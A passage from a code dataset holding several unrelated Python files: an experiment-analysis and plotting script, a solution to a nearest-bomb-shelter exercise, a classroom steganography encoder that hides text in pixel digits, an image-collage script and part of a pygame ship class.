np.log(df.groupby('id').count()).iloc[:,0:len(summary.columns)]*num_params\nparam_cost_df.columns = summary.columns\nBIC_summary = -2*summary + param_cost_df\n\n#extract column of best model\nmin_col = BIC_summary.idxmin(1)\nbest_models = min_col.map(lambda x: x[:x.find('_')])\nbayes_models = [i in ['bias2', 'bias1', 'ignore', 'eoptimal'] for i in best_models]\nmem_models = [i in ['memory', 'perseverance','permem'] for i in best_models]\n\nbest_posterior = []\nfor i in range(len(best_models)):\n subj_id = best_models.index[i]\n model = best_models[i]\n subj_df = df.query('id == \"%s\"' % subj_id)\n if model == 'random':\n best_posterior += [.5]*len(subj_df)\n else:\n best_posterior += list(subj_df[model + '_posterior'])\n \ndf['best_posterior'] = best_posterior\ndf['best_choice'] = (df['best_posterior']>.5).astype(int)\ndf['best_certainty'] = (abs(df['best_posterior']-.5))/.5\n\nall_df = df.copy()\nids = np.unique(df['id'])\nselect_ids = list(ids[label==1])\ndf_nonlearners = df.query('id not in %s' % select_ids)\ndf = df.query('id in %s' % select_ids)\n\n# *********************************************\n# Behavioral Analysis\n# ********************************************* \n#train analysis\ngtrain_df.loc[:,'last_FB'] = gtrain_df['FB'].shift()\ngtrain_df.loc[:,'last_choice'] = gtrain_df['subj_ts'].shift()\ngtrain_df.loc[df.index == 0,['last_FB','last_choice']] = np.nan\n\nparams = []\npvals = []\nformula = 'subj_ts ~ context + last_choice * last_FB'\ndelays = list(range(26))\nfor i in delays[1:]:\n formula += ' + context.shift(%s)' % i\nfor i in np.unique(df['id']):\n res = smf.glm(formula = formula, data = gtrain_df.query('id == \"%s\"' %i), family = sm.families.Binomial()).fit()\n params.append(res.params[1:]) \n pvals.append(res.pvalues[1:])\n\n\n#effect of last TS\ndf[['last_TS', 'bias2_last_choice']] = df[['subj_ts', 'bias2_choice']].shift(1)\ndf.loc[0,['last_TS','bias2_last_choice']]=np.nan\nformula = 'subj_ts ~ context'\ndelays = list(range(26))\nfor i in delays[1:]:\n formula += ' + context.shift(%s)' % i\n\n\nlearner_params = []\nfor i in np.unique(df['id']):\n res = smf.glm(formula = formula, data = df.query('id == \"%s\"' %i), family = sm.families.Binomial()).fit()\n learner_params.append(res.params[1:])\nlearner_params = pd.DataFrame(learner_params).mean()\n\nselect_ids = abs(df_nonlearners.groupby('id').subj_ts.mean()-.5)<.475\nselect_ids = list(select_ids[select_ids].index)\ndf_fail = df_nonlearners.query('id in %s' % select_ids)\nnonlearner_params = []\nfor i in np.unique(df_fail['id']):\n res = smf.glm(formula = formula, data = df_fail.query('id == \"%s\"' %i), family = sm.families.Binomial()).fit()\n nonlearner_params.append(res.params[1:])\nnonlearner_params = pd.DataFrame(nonlearner_params).mean()\n\n# *********************************************\n# Print Diagnostics\n# *********************************************\n\nif print_diagnoistic == True:\n for i in all_df.id.unique():\n id_df = all_df[all_df['id'] == i]\n if i in df.id.unique():\n print(i, 'learner, best: ', best_models.loc[i])\n else:\n print(i, 'nonlearner, best: ', best_models.loc[i])\n print('Pereseverance:', np.corrcoef(id_df.subj_ts,id_df.perseverance_choice)[1,0]) \n print('bias2:', np.corrcoef(id_df.subj_ts,id_df.bias2_choice)[1,0])\n print('bias1:', np.corrcoef(id_df.subj_ts,id_df.bias1_choice)[1,0]) \n print('')\n\n\n# *********************************************\n# Plotting\n# *********************************************\n\nif plot == True:\n contexts = np.unique(gtest_df.context)\n figdims = (16,12)\n fontsize = 20\n \n # ***************************\n # Plots for Learners - only using bayesian models\n # ***************************\n plot_df = df.copy()\n plot_df['rt'] = plot_df['rt']*1000\n plot_ids = np.unique(plot_df.id)\n \n # Plot task-set count by context value\n sns.set_style(\"darkgrid\", {\"axes.linewidth\": \"1.25\", \"axes.edgecolor\": \".15\"})\n p1 = plt.figure(figsize = figdims)\n plt.hold(True) \n plt.plot(plot_df.groupby('context').subj_ts.mean(), lw = 4, marker = 'o', markersize = 10, color = 'm', label = 'subject')\n plt.plot(plot_df.groupby('context').bias2_choice.mean(), lw = 4, marker = 'o', markersize = 10, color = 'c', label = 'bias-2 observer')\n plt.plot(plot_df.groupby('context').bias1_choice.mean(), lw = 4, marker = 'o', markersize = 10, color = 'c', ls = '--', label = 'bias-1 observer')\n plt.xticks(list(range(12)),contexts)\n plt.xlabel('Stimulus Vertical Position', size = fontsize)\n plt.ylabel('TS2 choice %', size = fontsize)\n pylab.legend(loc='best',prop={'size':20})\n for subj in plot_ids:\n subj_df = plot_df.query('id == \"%s\"' %subj)\n if subj_df.correct.mean() < .55:\n plt.plot(subj_df.groupby('context').subj_ts.mean(), lw = 2, color = 'r', alpha = .2)\n else:\n plt.plot(subj_df.groupby('context').subj_ts.mean(), lw = 2, color = 'k', alpha = .2)\n a = plt.axes([.62, .15, .3, .3])\n plt.plot(plot_df.groupby('context').subj_ts.mean(), lw = 4, marker = 'o', markersize = 10, color = 'm', label = 'subject')\n plt.plot(plot_df.groupby('context').eoptimal_choice.mean(), lw = 4, marker = 'o', markersize = 10, color = 'c', ls = '--', label = r'$\\epsilon$-optimal observer')\n plt.tick_params(\n axis = 'both',\n which = 'both',\n labelleft = 'off',\n labelbottom = 'off')\n pylab.legend(loc='upper left',prop={'size':14})\n \n\n # Plot task-set count by context value\n range_start = 0\n range_length = 7\n p2 = plt.figure(figsize = figdims)\n plt.hold(True) \n plt.xticks(list(range(12)),contexts)\n plt.xlabel('Stimulus Vertical Position', size = fontsize)\n plt.ylabel('TS2 choice %', size = fontsize)\n subj_df = plot_df.query('id == \"%s\"' %plot_ids[range_start])\n plt.plot(subj_df.groupby('context').subj_ts.mean(), lw = 2, alpha = 1, label = 'subject')\n for subj in plot_ids[range_start+1:range_start+range_length]:\n subj_df = plot_df.query('id == \"%s\"' %subj)\n plt.plot(subj_df.groupby('context').subj_ts.mean(), lw = 2, alpha = 1, label = '_nolegend_')\n plt.gca().set_color_cycle(None)\n subj_df = plot_df.query('id == \"%s\"' %plot_ids[range_start])\n plt.plot(subj_df.groupby('context').bias2_choice.mean(), lw = 2, ls = '--', label = 'bias-2 observer')\n for subj in plot_ids[range_start+1:range_start+range_length]:\n subj_df = plot_df.query('id == \"%s\"' %subj)\n plt.plot(subj_df.groupby('context').bias2_choice.mean(), lw = 2, ls = '--', label = '_nolegend_')\n pylab.legend(loc='best',prop={'size':20})\n\n \n # Plot rt against bias2 model posterior\n sns.set_context('poster')\n subj_df = plot_df.query('rt > 100 & id < \"%s\"' %plot_ids[4]) \n p3 = sns.lmplot(x='bias2_posterior',y='rt', hue = 'id', data = subj_df, order = 2, size = 6, col = 'id')\n p3.set_xlabels(\"P(TS2)\", size = fontsize)\n p3.set_ylabels('Reaction time (ms)', size = fontsize)\n p3.set_xticklabels(['',0,.2,.4,.6,.8,1,''])\n \n # Plot rt against bias2 model certainty\n # Take out RT < 100 ms \n sns.set_context('poster')\n subj_df = plot_df.query('rt > 100 & id < \"%s\"' %plot_ids[3]) \n p4 = sns.lmplot(x ='bias2_certainty', y = 'rt', hue = 'id', col = 'id', size = 6, data = subj_df) \n p4.set_xlabels(\"Model Confidence\", size = fontsize)\n p4.set_ylabels('Reaction time (ms)', size = fontsize)\n p4.set_xticklabels(['',0,.2,.4,.6,.8,1,''])\n \n p5 = sns.lmplot(x ='bias2_certainty', y = 'rt', hue = 'id', ci = None, legend = False, size = figdims[1], data = plot_df.query('rt>100')) \n plt.xlim(-.1,1.1)\n p5.set_xlabels(\"Model Confidence\", size = fontsize)\n p5.set_ylabels('Reaction time (ms)', size = fontsize)\n \n \n # plot bias2 parameters\n params_df = pd.DataFrame()\n params_df['id'] = [x[1:3] for x in bias2_fit_dict if ('_fullRun' in x)]\n params_df['learner'] = [x[0:3] in plot_ids for x in bias2_fit_dict if ('_fullRun' in x)] \n params_df['r1'] = [bias2_fit_dict[x]['r1'] for x in bias2_fit_dict if ('_fullRun' in x)]\n params_df['r2'] = [bias2_fit_dict[x]['r2'] for x in bias2_fit_dict if ('_fullRun' in x)]\n params_df['eps'] = [bias2_fit_dict[x]['TS_eps'] for x in bias2_fit_dict if ('_fullRun' in x)]\n params_df = pd.melt(params_df, id_vars = ['id','learner'], value_vars = ['eps','r1','r2'], var_name = 'param', value_name = 'val')\n\n p6 = plt.figure(figsize = figdims)\n ax = plt.subplot(111)\n box_palette = sns.color_palette(['m','c'], desat = 1)\n sns.boxplot(x = 'param', y = 'val', hue = 'learner', hue_order = [1,0], data = params_df, palette = box_palette)\n plt.xlabel(\"Parameter\", size = fontsize)\n plt.ylabel('Value', size = fontsize)\n plt.title('Bias-2 Model Parameter Fits', size = fontsize+4, y = 1.05)\n plt.xticks([0,1,2], ('$\\epsilon$','$r_1$','$r_2$'), size = fontsize)\n ax.legend(ax.get_legend_handles_labels()[0],['Learners','Non-learners'], loc = 'upper left')\n \n \n\n #look at models\n p7 = plt.figure(figsize = figdims)\n plt.hold(True)\n for c in log_posteriors.columns[:-1]:\n sns.kdeplot(summary[c])\n \n p8 = plt.figure(figsize = figdims)\n sns.heatmap(model_subj_compare)\n p9 = plt.figure(figsize = figdims)\n sns.heatmap(model_subj_compare.filter(regex='bias|eoptimal|ignore|subj_ts').corr())\n \n #********** Behavioral Plots **************************\n # look at RT\n p10 = plt.figure(figsize = figdims)\n plt.subplot(4,1,1)\n plot_df.rt.hist(bins = 25)\n plt.ylabel('Frequency', size = fontsize)\n \n plt.subplot(4,1,2) \n plt.hold(True)\n sns.kdeplot(plot_df.query('subj_switch == 0')['rt'],color = 'm', lw = 5, label = 'stay')\n sns.kdeplot(plot_df.query('subj_switch == 1')['rt'],color = 'c', lw = 5, label = 'switch')\n plot_df.query('subj_switch == 0')['rt'].hist(bins = 25, alpha = .4, color = 'm', normed = True)\n plot_df.query('subj_switch == 1')['rt'].hist(bins = 25, alpha = .4, color = 'c', normed = True)\n pylab.legend(loc='upper right',prop={'size':20})\n plt.xlim(xmin=0)\n\n \n plt.subplot(4,1,3)\n plt.hold(True)\n sns.kdeplot(plot_df.query('subj_switch == 0 and rep_resp == 1')['rt'], color = 'm', lw = 5, label = 'repeat response')\n sns.kdeplot(plot_df.query('subj_switch == 0 and rep_resp == 0')['rt'], color = 'c', lw = 5, label = 'change response (within task-set)')\n plot_df.query('subj_switch == 0 and rep_resp == 1')['rt'].hist(bins = 25, alpha = .4, color = 'm', normed = True)\n plot_df.query('subj_switch == 0 and rep_resp == 0')['rt'].hist(bins = 25, alpha = .4, color = 'c', normed = True)\n plt.ylabel('Probability Density', size = fontsize)\n pylab.legend(loc='upper right',prop={'size':20})\n plt.xlim(xmin=0)\n\n \n plt.subplot(4,1,4)\n plt.hold(True)\n sns.kdeplot(plot_df.query('subj_ts == 0')['rt'], color = 'm', lw = 5, label = 'TS1')\n sns.kdeplot(plot_df.query('subj_ts == 1')['rt'], color = 'c', lw = 5, label = 'TS2')\n plot_df.query('subj_ts == 0')['rt'].hist(bins = 25, alpha = .4, color = 'm', normed = True)\n plot_df.query('subj_ts == 1')['rt'].hist(bins = 25, alpha = .4, color = 'c', normed = True)\n plt.xlabel('Reaction Time (ms)', size = fontsize)\n pylab.legend(loc='upper right',prop={'size':20})\n plt.xlim(xmin=0)\n \n \n #***********************************\n # learner nonlearner behavioral plots\n #***********************************\n plot_df = pd.concat([df,df_fail])\n df.groupby(['last_TS','context']).subj_ts.mean().reset_index() \n \n p11 = plt.figure(figsize = figdims)\n p11.subplots_adjust(hspace=.3, wspace = .3)\n \n plt.subplot2grid((2,2),(0,0))\n sns.plt.plot(delays,learner_params, 'b-o', label = 'Learners', markersize = 10)\n sns.plt.plot(delays,nonlearner_params, 'r-o', label = 'Non-Learners', markersize = 10)\n plt.xlabel('Context Lag', size = fontsize)\n plt.ylabel('Beta Weights', size = fontsize)\n pylab.legend(loc='best',prop={'size':20})\n plt.tick_params(labelsize=15)\n \n plt.subplot2grid((2,2),(1,0), colspan = 1)\n sns.plt.scatter(range(len(group_means)),group_means, c = [['r','b'][i] for i in label])\n plt.ylabel('Accuracy', size = fontsize)\n plt.xlabel('Subject Index', size = fontsize)\n plt.xlim([-5,50])\n plt.tick_params(labelsize=15)\n \n plt.subplot2grid((2,2),(1,1), colspan = 1)\n sns.plt.plot(k,k_error, '-o')\n plt.ylabel('SSE', size = fontsize)\n plt.xlabel('Number of Clusters (k)', size = fontsize)\n plt.tick_params(labelsize=15)\n\n plt.subplot2grid((2,2),(0,1))\n for window in [(0,850)]:\n window_df = plot_df.query('trial_count >= %s and trials_since_switch < 27 and trial_count < %s' % (window[0], window[1]))\n plot_dict = {}\n for i in np.unique(window_df['id']):\n temp_df = window_df.query('id == \"%s\"' % i)\n plot_dict[i] = [temp_df.query('trials_since_switch == %s' % i)['correct'].mean() for i in np.unique(temp_df['trials_since_switch']) if np.sum(temp_df['trials_since_switch']==i)>5]\n plot_dict['trials_since_switch'] = list(range(max([len(arr) for arr in plot_dict.values()])))\n subplot_df = pd.DataFrame.from_dict(plot_dict, orient='index').transpose() \n \n subplot_df = pd.melt(subplot_df, id_vars = 'trials_since_switch', var_name = 'id', value_name = 'percent_correct')\n plt.scatter(subplot_df['trials_since_switch'], subplot_df['percent_correct'], color = 'b', alpha = .5) \n group = window_df.groupby('trials_since_switch').mean()['correct']\n plt.plot(group.index,group,'b-',lw = 4)\n\n for window in [(0,850)]:\n window_df = df_fail.query('trial_count >= %s and trials_since_switch < 27 and trial_count < %s' % (window[0], window[1]))\n plot_dict = {}\n for i in np.unique(window_df['id']):\n temp_df = window_df.query('id == \"%s\"' % i)\n plot_dict[i] = [temp_df.query('trials_since_switch == %s' % i)['correct'].mean() for i in np.unique(temp_df['trials_since_switch']) if np.sum(temp_df['trials_since_switch']==i)>5]\n plot_dict['trials_since_switch'] = list(range(max([len(arr) for arr in plot_dict.values()])))\n subplot_df = pd.DataFrame.from_dict(plot_dict, orient='index').transpose() \n \n subplot_df = pd.melt(subplot_df, id_vars = 'trials_since_switch', var_name = 'id', value_name = 'percent_correct')\n plt.scatter(subplot_df['trials_since_switch'], subplot_df['percent_correct'], color = 'r', alpha = .5) \n group = window_df.groupby('trials_since_switch').mean()['correct']\n plt.plot(group.index,group,'r-',lw = 4)\n plt.xlim(-1,28) \n plt.tick_params(labelsize=15)\n plt.ylabel('Percent Correct', size = fontsize)\n plt.xlabel('Trials Since Objective TS Switch', size = fontsize)\n\n if save == True:\n p1.savefig('../Plots/TS2%_vs_context.png', format = 'png', dpi = 300)\n p2.savefig('../Plots/Individual_subject_fits.png',format = 'png', dpi = 300)\n p3.savefig('../Plots/rt_vs_posterior_3subj.png', format = 'png', dpi = 300)\n p4.savefig('../Plots/rt_vs_confidence_3subj.png', format = 'png', dpi = 300)\n p5.savefig('../Plots/rt_vs_confidence.png', format = 'png', dpi = 300)\n p6.savefig('../Plots/bias2_param_value.png', format = 'png', dpi = 300)\n p7.savefig('../Plots/model_comparison.png', format = 'png', dpi = 300)\n p10.savefig('../Plots/RTs.png', format = 'png')\n p11.savefig('../Plots/Learner_vs_NonLearner.png', format = 'png', dpi = 300)\n plt.close('all')\n \n ","sub_path":"old_versions/Color_Shape_Task_V1/Analysis/Group_Analysis.py","file_name":"Group_Analysis.py","file_ext":"py","file_size_in_byte":20176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"18208723","text":"'''\nШтаб гражданской обороны Тридесятой области решил обновить план спасения на случай ядерной атаки. Известно, что все n\nселений Тридесятой области находятся вдоль одной прямой дороги. Вдоль дороги также расположены m бомбоубежищ, в которых\nжители селений могут укрыться на случай ядерной атаки.\nЧтобы спасение в случае ядерной тревоги проходило как можно эффективнее, необходимо для каждого селения определить\nближайшее к нему бомбоубежище.\nФормат ввода\nВ первой строке вводится число n - количество селений (1 <= n <= 100000). Вторая строка содержит n различных целых\nчисел, i-е из этих чисел задает расстояние от начала дороги до i-го селения. В третьей строке входных данных задается\nчисло m - количество бомбоубежищ (1 <= m <= 100000). Четвертая строка содержит m различных целых чисел, i-е из этих\nчисел задает расстояние от начала дороги до i-го бомбоубежища. Все расстояния положительны и не превышают 10⁹. Селение\nи убежище могут располагаться в одной точке.\nФормат вывода\nВыведите n чисел - для каждого селения выведите номер ближайшего к нему бомбоубежища. Бомбоубежища пронумерованы\nот 1 до m в том порядке, в котором они заданы во входных данных.\nУказание\nСоздайте список кортежей из пар (позиция селения, его номер в исходном списке), а также аналогичный список для\nбомбоубежищ. Отсортируйте эти списки.\nПеребирайте селения в поря��ке возрастания.\nДля селения ближайшими могут быть два соседних бомбоубежища, среди них надо выбрать ближайшее. При переходе к следующему\nселению не обязательно искать ближайшее бомбоубежище с самого начала. Его можно искать начиная с позиции, найденной для\nпредыдущего города. Аналогично, не нужно искать подходящее бомбоубежище до конца списка бомбоубежищ: достаточно найти\nсамое близкое. Если Вы неэффективно реализуете эту часть, то решение тесты не пройдет.\nДля хранения ответа используйте список, где индекс будет номером селения, а по этому индексу будет запоминаться номер\nбомбоубежища.\n'''\n# не проходит тест 6, может потом как-нить разберусь :)\n\ndef sort_position(n):\n # input data as a tuple with distance and index and sort it out\n tempData = list(map(int, input().split()))\n mylist = []\n for i in range(n):\n manData = (tempData[i], i)\n mylist.append(manData)\n mylist.sort()\n return mylist\n\n\ndef checker(villageList, shelterList):\n # finding nearest shelters before and after the village and comparing the distance to find the closest one\n answer = []\n i = 0\n j = 0\n s_distance_j, shelter_j = shelterList[0]\n while i < len(villageList) and j < len(shelterList):\n v_distance, village = villageList[i]\n s_distance, shelter = shelterList[j]\n if v_distance > s_distance:\n s_distance_j, shelter_j = shelterList[j]\n j += 1\n else:\n diff = abs(v_distance - s_distance)\n diff_j = abs(v_distance - s_distance_j)\n if diff < diff_j:\n answer.append((village + 1, shelter + 1))\n else:\n answer.append((village + 1, shelter_j + 1))\n i += 1\n # filling the answer with the last found shelter if shelters > villages\n for remain_part in range(i, len(villageList)):\n answer.append((i + 1, shelter_j + 1))\n answer.sort()\n return answer\n\n\ndef formatting(mylist):\n for item in mylist:\n print(item[1], end=' ')\n\n\nn = int(input())\nvillageList = sort_position(n)\nm = int(input())\nshelterList = sort_position(m)\n\nformatting(checker(villageList, shelterList))\n\n''' The version which worked out\n\namount_towns = int(input())\ntowns = list(enumerate(map(int, input().split()[:amount_towns]), 1))\namount_shelters = int(input())\nshelters = list(enumerate(map(int, input().split()[:amount_shelters]), 1))\ntowns.sort(key=lambda k: k[1])\nshelters.sort(key=lambda k: k[1])\n\nindex = 0\nresult = []\n\nfor town in towns:\n while (index + 1 < amount_shelters and \n abs(town[1] - shelters[index][1]) > abs(\n town[1] - shelters[index + 1][1])):\n index += 1\n else:\n result.append([town[0], shelters[index][0]])\n\nresult.sort()\nfor i in result:\n print(i[1], end=' ')\n'''\n","sub_path":"week6_bomb_shelters.py","file_name":"week6_bomb_shelters.py","file_ext":"py","file_size_in_byte":5742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"552946396","text":"\"\"\"\nSteganography methods for the imager application.\n\nThis module provides all of the test processing operations (encode, decode)\nthat are called by the application.\n Note that this class is a subclass of Filter.\nThis allows us to layer this functionality on top of the Instagram-filters,\nproviding this functionality in one application.\n\nBased on an original file by Dexter Kozen (dck10) and Walker White (wmw2)\n\nAuthor: Yan Zhu yz2477 Aroma Dong jd778\nDate: 11/20/2019\n\"\"\"\nimport a6filter\n\n\nclass Encoder(a6filter.Filter):\n \"\"\"\n A class that contains a collection of image processing methods\n\n This class is a subclass of Filter. That means it inherits all of the\n methods and attributes of that class too. We do that separate the\n steganography methods from the image filter methods, making the code\n easier to read.\n\n Both the `encode` and `decode` methods should work with the most recent\n image in the edit history.\n \"\"\"\n\n def encode(self, text):\n \"\"\"\n Returns True if it could hide the text; False otherwise.\n\n This method attemps to hide the given message text in the current\n image. This method first converts the text to a byte list using the\n encode() method in string to use UTF-8 representation:\n\n blist = list(text.encode('utf-8'))\n\n This allows the encode method to support all text, including emoji.\n\n If the text UTF-8 encoding requires more than 999999 bytes or the\n picture does not have enough pixels to store these bytes this method\n returns False without storing the message. However, if the number of\n bytes is both less than 1000000 and less than (# pixels - 10), then\n the encoding should succeed. So this method uses no more than 10\n pixels to store additional encoding information.\n\n Parameter text: a message to hide\n Precondition: text is a string\n \"\"\"\n # You may modify anything in the above specification EXCEPT\n # The first line (Returns True...)\n # The last paragraph (If the text UTF-8 encoding...)\n # The precondition (text is a string)\n assert type(text) == str\n\n current = self.getCurrent()\n\n blist = list(text.encode('utf-8'))\n bnum = len(blist)\n if bnum>999999 or len(current)-10< bnum:\n return False\n\n self._encode_pixel_str(0,'314')\n self._encode_pixel_str(1,'159')\n self._encode_pixel_str(2,'265')\n self._encode_pixel_str(3,'358')\n self._encode_pixel_str(4,'979')\n\n bnum2 = '0'*(6-len(str(bnum)))+str(bnum)\n self._encode_pixel_str(5,bnum2[:3])\n self._encode_pixel_str(6,bnum2[3:])\n\n for p in range(bnum):\n num = str(blist[p])\n if len(num) < 3:\n num = '0'*(3-len(num))+num\n self._encode_pixel_str(7+p,num)\n return True\n\n def decode(self):\n \"\"\"\n Returns the secret message (a string) stored in the current image.\n\n The message should be decoded as a list of bytes. Assuming that a list\n blist has only bytes (ints in 0.255), you can turn it into a string\n using UTF-8 with the decode method:\n\n text = bytes(blist).decode('utf-8')\n\n If no message is detected, or if there is an error in decoding the\n message, this method returns None\n \"\"\"\n # You may modify anything in the above specification EXCEPT\n # The first line (Returns the secret...)\n # The last paragraph (If no message is detected...)\n marker = ''\n for n in range(5):\n marker = marker + str(self._decode_pixel(n))\n if marker != '314159265358979':\n return None\n\n try:\n blist = []\n len = self._decode_pixel(5)*1000 + self._decode_pixel(6)\n if len == 0:\n return ''\n for n in range(len):\n blist.append(self._decode_pixel(n+7))\n text = bytes(blist).decode('utf-8')\n return text\n except:\n return None\n\n # HELPER METHODS\n def _decode_pixel(self, pos):\n \"\"\"\n Return: the number n hidden in pixel pos of the current image.\n\n This function assumes that the value was a 3-digit number encoded as\n the last digit in each color channel (e.g. red, green and blue).\n\n Parameter pos: a pixel position\n Precondition: pos is an int with 0 <= p < image length (as a 1d list)\n \"\"\"\n # This is helper. You do not have to use it.\n #You are allowed to change it.\n # There are no restrictions on how you can change it.\n rgb = self.getCurrent()[pos]\n red = rgb[0]\n green = rgb[1]\n blue = rgb[2]\n return (red % 10) * 100 + (green % 10) * 10 + blue % 10\n\n def _encode_pixel_str(self, pos, str):\n \"\"\"\n Encodes the 3-digit number represented by the string in the pixel at\n the position pos in the current image.\n This function will take the string that represents a 3-digit\n number and encode it at the given position.\n The first digit will be encoded in red, the second\n will be encoded in green, and the third be encoded in blue.\n Encoding a byte value will result in an invalid rgb value (> 255)\n thus will be substracted from the tens place of the appropriate\n color value.\n\n Parameter pos: a pixel position\n Precondition: pos is an int and 0 <= p < image length\n Parameter str: a string representation of a number to encode\n Precondition: a str of a 3-digit integer\n \"\"\"\n rgb = self.getCurrent()[pos]\n red = rgb[0]\n green = rgb[1]\n blue = rgb[2]\n\n d1 = int(str[0])\n d2 = int(str[1])\n d3 = int(str[2])\n\n red = (red//10)*10 +d1\n green = (green//10)*10 +d2\n blue = (blue//10)*10 +d3\n\n if red>255:\n red = red-10\n if green>255:\n green = green-10\n if blue>255:\n blue = blue-10\n\n self.getCurrent()[pos] = (red,green,blue)\n","sub_path":"Imager/a6encode.py","file_name":"a6encode.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"18518180","text":"import matplotlib.pyplot as plt\r\nimport os.path\r\nimport numpy as np\r\nimport PIL\r\nimport PIL.ImageDraw\r\n\r\n#Open explosion picture in numpy\r\ndirectory = os.path.dirname(os.path.abspath(__file__))\r\nfilepath_explosion = os.path.join(directory, 'explosion.jpg')\r\nexplosion_numpy = plt.imread(filepath_explosion)\r\n\r\n#Open cat image in numpy\r\nfilepath_cat = os.path.join(directory, 'cat.jpg')\r\ncat_numpy = plt.imread(filepath_cat)\r\n\r\n#Open dog image in numpy\r\nfilepath_dog = os.path.join(directory, 'dog.jpg')\r\ndog_numpy = plt.imread(filepath_dog)\r\n\r\n#Convert all numpy images to PIL\r\nexplosion_image_pil = PIL.Image.fromarray(explosion_numpy)\r\ncat_image_pil = PIL.Image.fromarray(cat_numpy)\r\ndog_image_pil = PIL.Image.fromarray(dog_numpy)\r\n\r\n#(Attempting to) cut the background from the cat and dog pictures.\r\ncat_crop = cat_image_pil.crop((404, 262, 1659, 2182))\r\ndog_crop = dog_image_pil.crop((198, 83, 913, 884))\r\n\r\n#Reduce size of cat and dog to fit on explosion picture.\r\ncat_img_small = cat_crop.resize((250, 350))\r\ndog_img_small = dog_crop.resize((550, 380))\r\n\r\n#Place cat and dog on appropriate locations of explosion\r\nexplosion_image_pil.paste(cat_img_small,(877, 656))\r\nexplosion_image_pil.paste(dog_img_small,(304, 155))\r\n\r\n#Convert explosion image back to numpy\r\nexplosion_numpy = np.array(explosion_image_pil)\r\n\r\n#Recolor the cat's eyes to an evil red\r\nfor r in range(719, 730):\r\n for c in range(914, 931):\r\n if sum(explosion_numpy[r][c])< 550:\r\n explosion_numpy[r][c] = [255,0,0] \r\nfor r in range(720, 730):\r\n for c in range(958, 972):\r\n if sum(explosion_numpy[r][c])< 280:\r\n explosion_numpy[r][c] = [255,0,0] \r\n\r\n#Recolor the explosion to...green?\r\nfor r in range(531,847):\r\n for c in range(256,834):\r\n if sum(explosion_numpy[r][c]) > 350:\r\n explosion_numpy[r][c] = [0,177,0]\r\n\r\n#Display the completed image.\r\nfig, ax = plt.subplots(1, 1)\r\nax.imshow(explosion_numpy, interpolation='none')\r\nfig.show()\r\n\r\n#Photos taken from: Wikipedia (reuse with edit rights)","sub_path":"files/1.4 Project.py","file_name":"1.4 Project.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"121419663","text":"import misc, math, orders, pygame, effects\n\ntry:\n import psyco\n psyco.profile()\nexcept ImportError:\n pass\n\nclass Ship():\n #basic stats for drawing & position.\n radius = 8 # Size of the ship from the centre - size of largest part (if multiple parts are added)\n rotation = math.radians(270.0) # Initial rotation of the ship. Changes every now and then for testing, doesn't matter usually.\n # r43 : Changed to rotation instead of intRotation\n dead = False # I'M ALIVEEEE\n #speed stats.\n speed = 2.5\n rotateSpeed = 0.05 # Rotation\n\n health = 1 # integer for the health of the ship\n\n points = [] # List of veticies that make up the ship.\n\n formation = False\n \n def __init__(self, view, player, x, y):\n self.player = player\n self.view = view\n self.colour = self.player.colour\n self.x, self.y = x, y\n self.shieldRadius = self.radius + 2\n self.orders = [orders.Idle(self)]\n self.moving = False\n self.built = False\n self.calcPoints()\n self.calcExtras() # Stuff that isn't points but needs to be calced.\n \n def drawShield(self, hitBy):\n self.view.effects.append(effects.BubbleShield(self, self.view, (self.x, self.y), self.shieldRadius, 0))\n #self.view.effects.append(effects.AngleShield(self, self.view, (self.x, self.y), self.radius + 2, 0, hitBy))\n \n def damaged(self, amount, hitBy):\n self.health -= amount\n self.drawShield(hitBy)\n if self.health <= 0:\n self.die()\n \n def remove(self):\n self.dead = True\n for i in range(len(self.player.ships)):\n if self.player.ships[i] == self:\n del self.player.ships[i]\n break\n for i in range(len(self.view.selectedShips)):\n if self.view.selectedShips[i] == self:\n del self.view.selectedShips[i]\n break\n del self\n \n def die(self):\n self.view.effects.append(effects.ExplosionShip(self.view, self, 10))\n self.view.effects.append(effects.Explosion(self.view, (self.x, self.y), 0.5, (self.radius * 4), misc.WHITE))\n #and remove the ship when done.\n self.remove()\n #any player related stats go here. like death count and such. Dunno if we want need these but hum.\n\n def calcExtras(self):\n pass\n \n def draw(self):\n if self.needsToCalcPoints:\n self.calcPoints()\n #self.drawOrders()\n pygame.draw.polygon(self.view.screen, misc.BLACK, self.offsetPoints())\n pygame.draw.aalines(self.view.screen, self.colour, True, self.offsetPoints())\n\n def drawOrders(self):\n lastx, lasty = self.x, self.y\n for order in self.orders:\n tempxy = order.xy()\n if not tempxy is False:\n pygame.draw.line(self.view.screen, order.colour, ((lastx - self.view.x) * self.view.zoom, (lasty - self.view.y) * self.view.zoom), ((tempxy[0] - self.view.x) * self.view.zoom, (tempxy[1] - self.view.y) * self.view.zoom))\n #pygame.draw.circle(screen, (20,20,20), ((order.x - view.x) * view.zoom, (order.y - view.y) * view.zoom), 2)\n lastx, lasty = tempxy[0], tempxy[1]\n \n def rotateTowardAngle(self, angle):\n if misc.positive(angle - self.rotation) < self.rotateSpeed: # If rotation speed is bigger than the amount which you need to turn\n self.rotation = angle # then only turn to face the desired angle\n else:\n if misc.normalisedAngle(angle - self.rotation) > math.pi: # If the angle which you're rotating towards is more 180 degrees to the right, it makes more sense to turn left\n self.rotation = misc.normalisedAngle(self.rotation - self.rotateSpeed) # Turn left by self.rotateSpeed\n else:\n self.rotation = misc.normalisedAngle(self.rotation + self.rotateSpeed) # Turn right by self.rotateSpeed\n self.needsToCalcPoints = True\n\n def moveForward(self): \n self.y -= math.cos(self.rotation) * self.speed\n self.x += math.sin(self.rotation) * self.speed\n self.needsToCalcPoints = True\n\n def poll(self):\n #update the ships data\n self.orders[0].poll()\n self.calcExtras()\n# self.view.lowEffects.append(effects.StaticParticle(self.view, self.x + self.radius * math.sin(self.rotation + math.pi), (self.y - self.radius * math.cos(self.rotation + math.pi)), 5))\n\n def angleToXY(self, x, y):\n #calculate the angle from the referenced ships heading to the\n #given x,y point.\n if self.y - y > 0:\n return misc.normalisedAngle(math.atan((self.x-x)/(y-self.y)))\n elif self.y - y == 0:\n return misc.normalisedAngle(-math.atan(self.x-x))\n else:\n return 